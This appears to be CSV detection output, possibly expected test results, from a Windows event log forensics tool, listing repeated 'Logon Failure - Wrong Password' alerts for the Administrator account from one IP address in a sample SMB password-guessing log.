+2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
